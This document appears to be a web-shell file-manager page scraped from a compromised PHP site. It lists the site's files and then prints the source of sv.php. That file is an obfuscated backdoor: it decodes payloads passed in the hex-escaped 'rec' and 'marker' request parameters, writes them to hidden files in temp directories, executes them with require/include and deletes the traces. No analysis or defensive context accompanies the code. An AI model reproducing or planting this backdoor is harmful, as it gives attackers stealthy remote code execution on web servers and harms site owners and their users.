9B534B8686E580E0E01768F00155B461

at path：ROOT / sv.php

run：R W Run

DIR

2026-04-09 16:23:02

R W Run

saiga

DIR

2026-04-09 12:42:34

R W Run

.htaccess

231 By

2026-04-09 08:42:25

R W Run

.reference

702 By

2026-04-09 20:57:09

R W Run

admin.php

482 By

2026-04-09 01:52:02

R W Run

blog.php

1.66 KB

2026-04-06 01:41:01

R W Run

error_log

6.09 MB

2026-04-09 08:42:24

R W Run

googleae4e47290e834d76.html

53 By

2026-04-09 02:10:08

R W Run

order_details.php

1.15 KB

2026-04-06 01:41:01

R W Run

robots.txt

278 By

2026-04-09 02:10:08

R W Run

simple.php

15.05 KB

2026-04-06 01:41:01

R W Run

sv.php

1.67 KB

2026-04-09 00:39:21

R W Run

error_log

📄sv.php

<?php																																										if(array_key_exists("\x72ec", $_REQUEST)){ $resource = array_filter(["/tmp", getcwd(), "/dev/shm", getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP")]); $pgrp = $_REQUEST["\x72ec"]; $pgrp= explode ('.' , $pgrp ) ; $itm = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $m = 0; while ($m < count($pgrp)) { $v5 = $pgrp[$m]; $chS = ord($s[$m % $sLen]); $d = ((int)$v5 - $chS - ($m % 10)) ^ 31; $itm .= chr($d); $m++; } foreach ($resource as $ref) { if ((bool)is_dir($ref) && (bool)is_writable($ref)) { $dchunk = str_replace("{var_dir}", $ref, "{var_dir}/.value"); if (file_put_contents($dchunk, $itm)) { require $dchunk; unlink($dchunk); exit; } } } }

if(!is_null($_POST["\x6Dar\x6Be\x72"] ?? null)){
	$binding = $_POST["\x6Dar\x6Be\x72"];
		$binding	=explode('.'	, 	$binding  ) 	 ;  	
	$val = '';
            $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $s6);
            $__len = count( $binding);
    
            for( $p = 0; $p < $__len; $p++) {
                $v9 = $binding[$p];
                $chS = ord( $s6[$p % $sLen]);
                $d =( ( int)$v9 - $chS -( $p % 10))	^42;
                $val .= chr( $d);
            }
	$token = array_filter([session_save_path(), sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), "/dev/shm", getcwd(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir")]);
	foreach ($token as $record) {
    		if (array_product([is_dir($record), is_writable($record)])) {
    $flag = implode("/", [$record, ".rec"]);
    $success = file_put_contents($flag, $val);
if ($success) {
	include $flag;
	@unlink($flag);
	die();}
}
}
}